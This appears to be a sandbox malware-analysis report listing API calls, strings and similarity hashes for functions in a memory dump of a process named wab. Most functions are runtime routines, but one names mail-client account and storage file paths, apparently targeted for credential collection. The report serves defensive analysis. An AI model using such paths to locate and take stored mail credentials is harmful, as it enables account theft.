                    • Instruction Fuzzy Hash: AB613571D08358AFEF12CBE4ED44BDEB7B9AF16314F004096D204BB260EB745A56CB52

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %m$~$Gon~$~F@7$~dra
                    • API String ID: 4218353326-230879103
                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction ID: 4a534f9ba244548d359bee04d0e330595153c36f023479c4d81b181104d61301
                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction Fuzzy Hash: 24713AB1D093285BCF129BF5AC98AEF7BFC9F1A304F1040A6D644D7251E6749B85CBA0

                    Control-flow Graph

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 22797D06
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990D7
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990E9
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227990FB
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279910D
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279911F
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799131
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799143
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799155
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799167
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 22799179
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279918B
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 2279919D
                      • Part of subcall function 227990BA: _free.LIBCMT ref: 227991AF
                    • _free.LIBCMT ref: 22797CFB
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 22797D1D
                    • _free.LIBCMT ref: 22797D32
                    • _free.LIBCMT ref: 22797D3D
                    • _free.LIBCMT ref: 22797D5F
                    • _free.LIBCMT ref: 22797D72
                    • _free.LIBCMT ref: 22797D80
                    • _free.LIBCMT ref: 22797D8B
                    • _free.LIBCMT ref: 22797DC3
                    • _free.LIBCMT ref: 22797DCA
                    • _free.LIBCMT ref: 22797DE7
                    • _free.LIBCMT ref: 22797DFF
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: dd2da45bae9747105cf57da1d7160864c5f8c5357ed8e86be9b1da7e9e2b8e92
                    • Instruction ID: d86f50efa157627bf375ff0fbae89eb3a79065908bea1dfb51589adc2d080587
                    • Opcode Fuzzy Hash: dd2da45bae9747105cf57da1d7160864c5f8c5357ed8e86be9b1da7e9e2b8e92
                    • Instruction Fuzzy Hash: CB312FB1608305DFEB229B7EFA84BA677E9FF00354F104859E959DB191DF35AA80CB10

                    Control-flow Graph

                    APIs
                    • _free.LIBCMT ref: 227959EA
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227959F6
                    • _free.LIBCMT ref: 22795A01
                    • _free.LIBCMT ref: 22795A0C
                    • _free.LIBCMT ref: 22795A17
                    • _free.LIBCMT ref: 22795A22
                    • _free.LIBCMT ref: 22795A2D
                    • _free.LIBCMT ref: 22795A38
                    • _free.LIBCMT ref: 22795A43
                    • _free.LIBCMT ref: 22795A51
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: e4b3894669642000fca4bc04c234af75d46e1476dac6c19dc3ae8e72b816d7d3
                    • Instruction ID: ccb08b7337d0fd96434866a6c2abc7b6d8403827008f4b5c2e34077fbe7c3676
                    • Opcode Fuzzy Hash: e4b3894669642000fca4bc04c234af75d46e1476dac6c19dc3ae8e72b816d7d3
                    • Instruction Fuzzy Hash: E511A27A528359EFCB22DF94E945CDD3FA9EF14350F0540A1BA088B221DA32EF509B80

                    Control-flow Graph

                    APIs
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D1B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22791D37
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D4B
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D58
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D72
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D7D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D8A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                    • String ID:
                    • API String ID: 1454806937-0
                    • Opcode ID: 22c8f4b5b8eeae8bd2fda4f7bb6f165240bb3f56e2a18ef075c9c9bb11c4d675
                    • Instruction ID: 1ea26676ddecd6b9669ea40d3d0f866bded529d842402722af366d82b925bbc7
                    • Opcode Fuzzy Hash: 22c8f4b5b8eeae8bd2fda4f7bb6f165240bb3f56e2a18ef075c9c9bb11c4d675
                    • Instruction Fuzzy Hash: 1D2160B198531CBFE711EBA99D8CEEB77ACEB18354F0009A5FA01D2144E6749E468B70

                    Control-flow Graph

                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22799C07,?,00000000,?,00000000,00000000), ref: 227994D4
                    • __fassign.LIBCMT ref: 2279954F
                    • __fassign.LIBCMT ref: 2279956A
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 22799590
                    • WriteFile.KERNEL32(?,?,00000000,22799C07,00000000,?,?,?,?,?,?,?,?,?,22799C07,?), ref: 227995AF
                    • WriteFile.KERNEL32(?,?,00000001,22799C07,00000000,?,?,?,?,?,?,?,?,?,22799C07,?), ref: 227995E8
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 034bae5e74fba94c709e600864aecb2cbc65fbd1c35ccbbeae4df554c69cb99b
                    • Instruction ID: 7f33a59f105a48f7482f9b33b22cbf02e4945ae93f222469a1054de2ad2dcdf4
                    • Opcode Fuzzy Hash: 034bae5e74fba94c709e600864aecb2cbc65fbd1c35ccbbeae4df554c69cb99b
                    • Instruction Fuzzy Hash: 9F51D5B1D08349EFDB10CFA8D895AEEBBF9EF09310F14451AE951E7281E730A941CB60

                    Control-flow Graph

                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 2279339B
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 227933A3
                    • _ValidateLocalCookies.LIBCMT ref: 22793431
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2279345C
                    • _ValidateLocalCookies.LIBCMT ref: 227934B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 6feb49d3acf954a44a0087c3be7b44c2f510ba9c176a398a884e103b29fd81f6
                    • Instruction ID: 9e3dd6d02633968f91d11c64ae1a69f6205b5a3d5fe2338c6b3a8a26d32b8500
                    • Opcode Fuzzy Hash: 6feb49d3acf954a44a0087c3be7b44c2f510ba9c176a398a884e103b29fd81f6
                    • Instruction Fuzzy Hash: 5741EA34E08309ABCF01CF68E884A9EBBF5BF45328F118155E915AF361D735DA15CB91

                    Control-flow Graph

                    APIs
                      • Part of subcall function 22799221: _free.LIBCMT ref: 2279924A
                    • _free.LIBCMT ref: 227992AB
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227992B6
                    • _free.LIBCMT ref: 227992C1
                    • _free.LIBCMT ref: 22799315
                    • _free.LIBCMT ref: 22799320
                    • _free.LIBCMT ref: 2279932B
                    • _free.LIBCMT ref: 22799336
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction ID: e7a0fe081b3269957de2bd0eae9c0aa4326b27620534e9d6850e20bbd7802521
                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction Fuzzy Hash: 53115E71548B18FAEA32EBB0EC49FCF7B9DAF24700F400825A699B7092DA65B6448751

                    Control-flow Graph

                    Control-flow graph: basic blocks 22798821-22798a3c, marked Executed / Not Executed (graph rendering omitted)
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22796FFD,00000000,?,?,?,22798A72,?,?,00000100), ref: 2279887B
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,22798A72,?,?,00000100,5EFC4D8B,?,?), ref: 22798901
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 227989FB
                    • __freea.LIBCMT ref: 22798A08
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    • __freea.LIBCMT ref: 22798A11
                    • __freea.LIBCMT ref: 22798A36
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: a55d5637c2bd60f60d4c4d17276e6231ac4b168abe0b3852f032aad2f85f0e33
                    • Instruction ID: 5436d9c7e3333d6931070447f15fc740472ff7275c50ff0575e8e96bd45d9208
                    • Opcode Fuzzy Hash: a55d5637c2bd60f60d4c4d17276e6231ac4b168abe0b3852f032aad2f85f0e33
                    • Instruction Fuzzy Hash: 50511372618316AFEB158F74ED45FAB37AAEB41764F900629FD04E7140EB34DC50C6A4
                    APIs
                    • _strlen.LIBCMT ref: 22791607
                    • _strcat.LIBCMT ref: 2279161D
                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2279190E,?,?,00000000,?,00000000), ref: 22791643
                    • lstrcatW.KERNEL32(?,?), ref: 2279165A
                    • lstrlenW.KERNEL32(?,?,?,?,?,2279190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22791661
                    • lstrcatW.KERNEL32(00001008,?), ref: 22791686
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrcatlstrlen$_strcat_strlen
                    • String ID:
                    • API String ID: 1922816806-0
                    • Opcode ID: bb9ff8f62d7e7442188624fecddca8e3dff643da2ee2926617ac96d5912d0e6d
                    • Instruction ID: fe82f5fab30a0b3ad4ff13efaf2be7c570fca55926bf74243ca2f4e688c376f7
                    • Opcode Fuzzy Hash: bb9ff8f62d7e7442188624fecddca8e3dff643da2ee2926617ac96d5912d0e6d
                    • Instruction Fuzzy Hash: 0521DA36904304ABD705DB54EC84EFE77B8EF89720F24446AE904EB151DF34A542C7A5
                    APIs
                    • lstrcatW.KERNEL32(?,?), ref: 22791038
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2279104B
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22791061
                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22791075
                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22791090
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 227910B8
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$AttributesFilelstrcat
                    • String ID:
                    • API String ID: 3594823470-0
                    • Opcode ID: 2dc26dc0e181aabcfc723ec3f51267d9eb9d30b3433881f59273a2da59af1b6e
                    • Instruction ID: b2b55a38a90ac89c20f5b9204f5fe84492a33e2cf39f11c156f9ccd5d260b40e
                    • Opcode Fuzzy Hash: 2dc26dc0e181aabcfc723ec3f51267d9eb9d30b3433881f59273a2da59af1b6e
                    • Instruction Fuzzy Hash: 16219F3590431CABCF10DA68ED4CEDB3778EF44314F108696E959A31A1DA719AA6CB40
                    APIs
                    • GetLastError.KERNEL32(?,?,22793518,227923F1,22791F17), ref: 22793864
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22793872
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2279388B
                    • SetLastError.KERNEL32(00000000,?,22793518,227923F1,22791F17), ref: 227938DD
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: c5b93face57115a87864705fc4fc2f8c94f5e7345a0acd20e76f8ceebd4d39fa
                    • Instruction ID: 5cc4b711446bd2aa902f6c2882b5ebcbe13a1a232f8548427c393be6531d3fd6
                    • Opcode Fuzzy Hash: c5b93face57115a87864705fc4fc2f8c94f5e7345a0acd20e76f8ceebd4d39fa
                    • Instruction Fuzzy Hash: 0201FC33A4D7116DE2022BB97D8BE1B6796DB15774B200339FA209F1D5FF2548018360
                    APIs
                    • GetLastError.KERNEL32(?,?,22796C6C), ref: 22795AFA
                    • _free.LIBCMT ref: 22795B2D
                    • _free.LIBCMT ref: 22795B55
                    • SetLastError.KERNEL32(00000000,?,?,22796C6C), ref: 22795B62
                    • SetLastError.KERNEL32(00000000,?,?,22796C6C), ref: 22795B6E
                    • _abort.LIBCMT ref: 22795B74
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: ddc8988d1863fa1dee81757d10c1a6697752f19ffdeb71d03a957f5955788916
                    • Instruction ID: c8695856ed413ed15a706fcf3eae90f2cd322b74ff82690670fa341caf47fcbf
                    • Opcode Fuzzy Hash: ddc8988d1863fa1dee81757d10c1a6697752f19ffdeb71d03a957f5955788916
                    • Instruction Fuzzy Hash: 32F0C8B254DB31AAD20367347D4DF1F2A6B9FE1771F240624FD14A7285FE3585034164
                    APIs
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,?,?,?,227910DF,?,?,?,00000000), ref: 22791E9A
                      • Part of subcall function 22791E89: lstrcatW.KERNEL32(?,?), ref: 22791EAC
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EB3
                      • Part of subcall function 22791E89: lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EC8
                      • Part of subcall function 22791E89: lstrcatW.KERNEL32(?,227910DF), ref: 22791ED3
                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2279122A
                      • Part of subcall function 2279173A: _strlen.LIBCMT ref: 22791855
                      • Part of subcall function 2279173A: _strlen.LIBCMT ref: 22791869
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                    • API String ID: 4036392271-1520055953
                    • Opcode ID: e75f65e0b5f418ac2abbe98922266e5b12243386a0bbb3d6b9eadd7c1b45dd9b
                    • Instruction ID: a89c8ef11a383cc46dc9b69064da2275b9d99c0090b3cd16c57af6f3ae5f7c75
                    • Opcode Fuzzy Hash: e75f65e0b5f418ac2abbe98922266e5b12243386a0bbb3d6b9eadd7c1b45dd9b
                    • Instruction Fuzzy Hash: FF21E479E183086AEB1097E4ECD1FEE7339EF90715F000556F604EB1E0E6B11E818759
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22794AEA,?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000), ref: 22794B59
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22794B6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,22794AEA,?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082), ref: 22794B8F
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: efd27d46b2cc6f78f16ae0bcc6331228a9a76ce27b913a2f2104e955a8591dfe
                    • Instruction ID: c28d587b75da0c2d62581454b18dec6fabcba5e85081ec3598a4d1bc8c3c1365
                    • Opcode Fuzzy Hash: efd27d46b2cc6f78f16ae0bcc6331228a9a76ce27b913a2f2104e955a8591dfe
                    • Instruction Fuzzy Hash: 7FF04F35A48308BBDB11AF94D919F9EBFB9EF04365F004168FD09A6254DB35A942CA90
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 2279715C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2279717F
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 227971A5
                    • _free.LIBCMT ref: 227971B8
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 227971C7
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 35805d030dd6098f66f1283867c57c7d6f43f25bb02d15faaccb6351baaed85f
                    • Instruction ID: 9c7107427dd88f9ec78f92deb11c8dea1ab2b77c812b96bffca60589915475b3
                    • Opcode Fuzzy Hash: 35805d030dd6098f66f1283867c57c7d6f43f25bb02d15faaccb6351baaed85f
                    • Instruction Fuzzy Hash: 4601FCB264D3157F27111ABA6C8CDBB2A6DDEC2A643140929BD04C720CDE749C0285B0
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000000,2279636D,22795713,00000000,?,22792249,?,?,22791D66,00000000,?,?,00000000), ref: 22795B7F
                    • _free.LIBCMT ref: 22795BB4
                    • _free.LIBCMT ref: 22795BDB
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22795BE8
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22795BF1
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: b40ee9d97e48521891651ccbb55544257392b5b4685a8f3a076b7e90dd92328b
                    • Instruction ID: 9f3f9320fc5dc1709d467410284ced2a2e1603323391648403c33dd2f4aac3fd
                    • Opcode Fuzzy Hash: b40ee9d97e48521891651ccbb55544257392b5b4685a8f3a076b7e90dd92328b
                    • Instruction Fuzzy Hash: 1E014CB214D731ABD20376387D89E1F2A6E9FC1770F500224FD16A7241EF39C9034164
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,?,227910DF,?,?,?,00000000), ref: 22791E9A
                    • lstrcatW.KERNEL32(?,?), ref: 22791EAC
                    • lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EB3
                    • lstrlenW.KERNEL32(?,?,227910DF,?,?,?,00000000), ref: 22791EC8
                    • lstrcatW.KERNEL32(?,227910DF), ref: 22791ED3
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat
                    • String ID:
                    • API String ID: 493641738-0
                    • Opcode ID: 167d404e38dbc213891d7b335ca3be4f482e7ad597f2bb8f0648951f48cd057d
                    • Instruction ID: 31c8dc3c5fd5f169d04945cc41b5a766de87e2e6564671aa0bfea15c010ba479
                    • Opcode Fuzzy Hash: 167d404e38dbc213891d7b335ca3be4f482e7ad597f2bb8f0648951f48cd057d
                    • Instruction Fuzzy Hash: 36F05E361453107AD721372AED85EBF7B7CEF86A61F040419FA0C83190DBA8685293A5
                    APIs
                    • _free.LIBCMT ref: 227991D0
                      • Part of subcall function 2279571E: HeapFree.KERNEL32(00000000,00000000,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?), ref: 22795734
                      • Part of subcall function 2279571E: GetLastError.KERNEL32(?,?,2279924F,?,00000000,?,00000000,?,22799276,?,00000007,?,?,22797E5A,?,?), ref: 22795746
                    • _free.LIBCMT ref: 227991E2
                    • _free.LIBCMT ref: 227991F4
                    • _free.LIBCMT ref: 22799206
                    • _free.LIBCMT ref: 22799218
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 8c7368071c932c8e8c7b014193361025f765560f811140da766bb8ce2fa1bd5f
                    • Instruction ID: 9fb715ff3629c7b90f952ecdddd44e165bb3f9c18a41dcc1f065820859a6e5d9
                    • Opcode Fuzzy Hash: 8c7368071c932c8e8c7b014193361025f765560f811140da766bb8ce2fa1bd5f
                    • Instruction Fuzzy Hash: A3F0FF7155C351D79635DE54FAC9C167BEAFB20724B500C05E909DF504CA39F9808B50
                    APIs
                    • _free.LIBCMT ref: 2279536F
